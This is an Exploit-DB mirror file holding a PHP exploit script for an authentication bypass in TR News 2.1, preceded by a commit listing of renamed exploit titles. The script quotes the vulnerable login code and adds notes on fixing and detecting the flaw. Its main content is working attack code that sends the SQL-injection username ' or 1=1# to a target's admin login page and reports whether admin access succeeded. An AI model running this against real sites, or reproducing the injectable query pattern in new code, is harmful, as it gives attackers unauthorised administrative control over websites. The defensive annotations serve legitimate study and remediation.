exploit-db-mirror/platforms/php/webapps/6991.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00


<?php
// Silences every PHP diagnostic for the rest of the run.
error_reporting(0);
/*
------------------------------------------------------
TR News <= 2.1 (login.php) Remote Login ByPass Exploit
------------------------------------------------------
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/trscript-21.zip

Vulnerable code, file admin/login.php:

1. <?
2. if(isset($_POST['login_ad']) && ($_POST['password']))
3. {
4. include("../include/connexion.php");
5. $login=$_POST["login_ad"];
6. $pass=md5($_POST["password"]);
7. $sql="SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";
8. $p = mysql_query($sql);
9. $row = mysql_fetch_assoc($p);
10. $admin = $row['admin'];
11. if($admin != 1)

Root cause: $login = $_POST["login_ad"]; isn't escaped before it is
interpolated into the SQL string on line 7, so SQL code can be inserted
through the login field and the pseudo/pass comparison no longer decides
which row comes back.

How to fix (author's advice): sanitize $login with mysql_real_escape_string
or htmlentities.
NOTE(review): htmlentities() is an HTML output encoder, not a SQL defence.
The durable fix is a prepared statement with bound parameters (PDO or
mysqli) for both pseudo and pass; the mysql_* functions shown above were
removed in PHP 7. Line 6 also shows passwords compared as unsalted MD5;
password_hash()/password_verify() is the replacement.

NOTE:
if the website is vulnerable, you must go to admin/login.php
Username: ' or 1=1#
Password: no-deface

Detection (from the request this script builds below): a POST to
<path>/admin/login.php whose login_ad field URL-decodes to the username
above, with the fixed password value "athos", answered by a redirect to
main.php?mode=main. Request-body logging or a WAF rule on SQL
metacharacters in login_ad will surface it.
*/
// Usage guard: athos() prints the usage text and exits when argv[1] is empty
// or when preg_match() reports a match (presumably meant to refuse an
// argument that carries an http:// scheme; the expected form is host/path).
if(preg_match('/http://(.+?)/i',$argv[1]) or empty($argv[1])) athos();
// Split "host/path" on '/': $host[0] is used as the hostname and $host[1]
// as the single path segment in front of /admin/login.php.
$host = explode('/',$argv[1]);
// Fixed form body: login_ad is the URL-encoded username from the note above,
// password is the literal string "athos".
$auth = "login_ad=%27+or+1%3D1%23&password=athos";
// Hand-built HTTP/1.1 POST to the admin login form.
$data = "POST /$host[1]/admin/login.php HTTP/1.1\r\n".
"Host: $host[0]\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($auth)."\r\n\r\n".
"$auth\r\n\r\n";
// Plain TCP connection to port 80 (no TLS); abort with a message on failure.
if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");
if(!fputs($socket,$data)) die("fputs() error!\n");
// Accumulate the raw response (headers and body) until end of stream.
while(!feof($socket))
{
$content .= fgets($socket);
} fclose($socket);
// Verdict: a case-insensitive "location: main.php?mode=main" anywhere in the
// raw response is treated as a successful login (presumably the redirect
// admin/login.php issues after authentication; confirm against the app).
if(preg_match("/location: main\.php\?mode=main/i",$content))
{
// exploiting() only prints a progress line before the verdict.
exploiting();
echo "\n[+] Exploit Successfully!\n[+] Site Vulnerable\n";
exit;
}
else
{
exploiting();
echo "\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n";
exit;
}
/**
 * Print the script banner and the command-line usage, then terminate.
 *
 * Reads the script name from the global $argv; never returns to the caller.
 */
function athos()
{
    global $argv;

    $banner = "[+] TR News <= 2.1 (login.php) Remote Login ByPass Exploit\n";
    $usage = "[+] Usage: php $argv[0] [host/path]\r\n";

    echo $banner;
    echo $usage;
    exit;
}
/**
 * Print a cosmetic progress line: the label followed by four dots,
 * pausing one second after each dot. Produces output only.
 */
function exploiting()
{
    echo "[+] Exploiting";

    $printed = 0;
    while ($printed < 4) {
        echo ".";
        sleep(1);
        $printed++;
    }
}
# milw0rm.com [2008-11-04]